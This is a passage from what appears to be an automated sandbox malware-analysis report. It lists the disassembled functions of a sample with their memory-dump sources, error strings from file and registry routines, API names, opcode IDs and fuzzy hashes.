                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: ab229aab2030bd151749b27b349bc1024d95e54e5932f5e3971a27717ef95fb5
                                                                                                                                                  • Instruction ID: 10dac0d2e907328ef49c1ebb450a079539c014521aec220a3f34d1ccac45a83f
                                                                                                                                                  • Opcode Fuzzy Hash: ab229aab2030bd151749b27b349bc1024d95e54e5932f5e3971a27717ef95fb5
                                                                                                                                                  • Instruction Fuzzy Hash: 16F08227B0860302F9729A1CB851BB911516F68765E4D4532EF4D8F7C1EE3DA8A7D300
                                                                                                                                                  Function 00007FF6BE032801 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: c6e1b0db9050e454bb62472ed409b0055bbd509787aa07c3d44467dc1f627cec
                                                                                                                                                  • Instruction ID: 976ee17106ca19f52d58e5ff4c49550bd5ed7dccd7020a6ebe2cadd585bf0887
                                                                                                                                                  • Opcode Fuzzy Hash: c6e1b0db9050e454bb62472ed409b0055bbd509787aa07c3d44467dc1f627cec
                                                                                                                                                  • Instruction Fuzzy Hash: 78F08227B0860302F9729A1CB851BB911516F68764E4D4532EF5D8F7C1EE3DA8A7D300
                                                                                                                                                  Function 00007FF6BE0326AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
                                                                                                                                                  • Instruction ID: 4ae5250ccc9fa443211308ce9d61bad0306ae04f20010c24151a2af6b8f8b3ee
                                                                                                                                                  • Opcode Fuzzy Hash: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
                                                                                                                                                  • Instruction Fuzzy Hash: 22F08227B0860302F9729A0CB951BB911516F68764F494532EF598F2D1EE3DA8A7C300
                                                                                                                                                  Function 00007FF6BE0326B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
                                                                                                                                                  • Instruction ID: 4e55e071187cbdc7a60e37831e777e5b4e1ead889f6f0ce7235afdca68deaa92
                                                                                                                                                  • Opcode Fuzzy Hash: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
                                                                                                                                                  • Instruction Fuzzy Hash: FDF08227B0860342F9729A0CB951BB911516F68764F494532EF4D8F2D1EE3DA8A7C300
                                                                                                                                                  Function 00007FF6BE03269D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
                                                                                                                                                  • Instruction ID: 90258c9353a4b218ad131c44c98bd254c6945d4ad3f33b282c6c31bd4e3a35f6
                                                                                                                                                  • Opcode Fuzzy Hash: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
                                                                                                                                                  • Instruction Fuzzy Hash: E0F08227B0860302F9729A0CB951BB911516F68764F494532EF4D8F2D1EE3DA8A7C300
                                                                                                                                                  Function 00007FF6BE0326A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
                                                                                                                                                  • Instruction ID: 610aaed009db09e7776aa7e3c3cfc7a5c902dccaf97f922d289943e1ff82dcb6
                                                                                                                                                  • Opcode Fuzzy Hash: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
                                                                                                                                                  • Instruction Fuzzy Hash: 97F08227B0860302F9729A0CB951BB911516F68765F494532EF498F2D1EE3DA8A7C300
                                                                                                                                                  Function 00007FF6BE0326B9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
                                                                                                                                                  • Instruction ID: bd15ec581227dc7e266ffb6788d381d5ddface8b9e7b2f888aa9694a6d8ff400
                                                                                                                                                  • Opcode Fuzzy Hash: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
                                                                                                                                                  • Instruction Fuzzy Hash: 4DF08227B0860302F9729A0CB951BB911516F68764F494532EF49CF6D1EE3DA8A7C300
                                                                                                                                                  Function 00007FF6BE0326EB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
                                                                                                                                                  • Instruction ID: 4e55e071187cbdc7a60e37831e777e5b4e1ead889f6f0ce7235afdca68deaa92
                                                                                                                                                  • Opcode Fuzzy Hash: a49be4b29de6a054d2a070e4a4779da211405afb78a1b38434590739e0465e8c
                                                                                                                                                  • Instruction Fuzzy Hash: FDF08227B0860342F9729A0CB951BB911516F68764F494532EF4D8F2D1EE3DA8A7C300
                                                                                                                                                  Function 00007FF6BE0326F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
                                                                                                                                                  • Instruction ID: bd15ec581227dc7e266ffb6788d381d5ddface8b9e7b2f888aa9694a6d8ff400
                                                                                                                                                  • Opcode Fuzzy Hash: 25c0fbb992ff6903f07dba86b08ebbf347e0dd2b2e2bfd93bd002d6724a7c21e
                                                                                                                                                  • Instruction Fuzzy Hash: 4DF08227B0860302F9729A0CB951BB911516F68764F494532EF49CF6D1EE3DA8A7C300
                                                                                                                                                  Function 00007FF6BE0326D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
                                                                                                                                                  • Instruction ID: 90258c9353a4b218ad131c44c98bd254c6945d4ad3f33b282c6c31bd4e3a35f6
                                                                                                                                                  • Opcode Fuzzy Hash: 8f18a1f2469a7fdb70db7ffee0d0267731bb2832d5fa1a4fcaee2b2d363ffd15
                                                                                                                                                  • Instruction Fuzzy Hash: E0F08227B0860302F9729A0CB951BB911516F68764F494532EF4D8F2D1EE3DA8A7C300
                                                                                                                                                  Function 00007FF6BE0326DD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
                                                                                                                                                  • Instruction ID: 610aaed009db09e7776aa7e3c3cfc7a5c902dccaf97f922d289943e1ff82dcb6
                                                                                                                                                  • Opcode Fuzzy Hash: 256f824a469a1a7e893449885ed68b795ebefb460f9cffb866b127dcdca9c9a7
                                                                                                                                                  • Instruction Fuzzy Hash: 97F08227B0860302F9729A0CB951BB911516F68765F494532EF498F2D1EE3DA8A7C300
                                                                                                                                                  Function 00007FF6BE0326E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
                                                                                                                                                  • Instruction ID: 4ae5250ccc9fa443211308ce9d61bad0306ae04f20010c24151a2af6b8f8b3ee
                                                                                                                                                  • Opcode Fuzzy Hash: 11597d17764ae774a5a2afb7a5df634d5478987383f5b5c3f7417a1326957474
                                                                                                                                                  • Instruction Fuzzy Hash: 22F08227B0860302F9729A0CB951BB911516F68764F494532EF598F2D1EE3DA8A7C300
                                                                                                                                                  Function 00007FF6BE035827 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: c0cddd2865619a54ec6232293f106fb97064ae862a9b86bbce8474b1505a66a2
                                                                                                                                                  • Instruction ID: 7adb13e5175edf97f57194d81c776f465c7b082735b1b6b003a607f7466e37db
                                                                                                                                                  • Opcode Fuzzy Hash: c0cddd2865619a54ec6232293f106fb97064ae862a9b86bbce8474b1505a66a2
                                                                                                                                                  • Instruction Fuzzy Hash: 96F09662B0874642E5628F08B9807797264FF68795F480136FF5DC66A4EF3CD9999300
                                                                                                                                                  Function 00007FF6BE03581D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 0879c6a44524d8b251e147b057380ee73abba84e16f301a98f496365444c6721
                                                                                                                                                  • Instruction ID: 1e30508467856541204ff945ab6963df07293f3ef69fe627b20dbf90d075b876
                                                                                                                                                  • Opcode Fuzzy Hash: 0879c6a44524d8b251e147b057380ee73abba84e16f301a98f496365444c6721
                                                                                                                                                  • Instruction Fuzzy Hash: 86F0F622B0870642E5628F08B9807797264EF68795F480236FF4DC66A0EF3CD9999300
                                                                                                                                                  Function 00007FF6BE0358AE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 26abaf404a186cce4437ed2da7a72a2f3e0e06abd906e563cf0bcb7fe33f66ef
                                                                                                                                                  • Instruction ID: bbb4499f8ed8ef8f4653617f29e81f4383dec73864d55192201c093877f553ff
                                                                                                                                                  • Opcode Fuzzy Hash: 26abaf404a186cce4437ed2da7a72a2f3e0e06abd906e563cf0bcb7fe33f66ef
                                                                                                                                                  • Instruction Fuzzy Hash: 93F09662B0874642E5628F08B9807797264EF68795F480136FF5DC66A4EF3CD9999300
                                                                                                                                                  Function 00007FF6BE0358BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                                                                                                                  • API String ID: 1001908780-1680961811
                                                                                                                                                  • Opcode ID: 2421130e589a518d8d6a899e34f192d6eae1fdef6248c36e69ef4aa482b17227
                                                                                                                                                  • Instruction ID: 1ae7d46490dab7f66c29f6c0e5f02e510c52921918caff1f77b6a78efe3b77a9
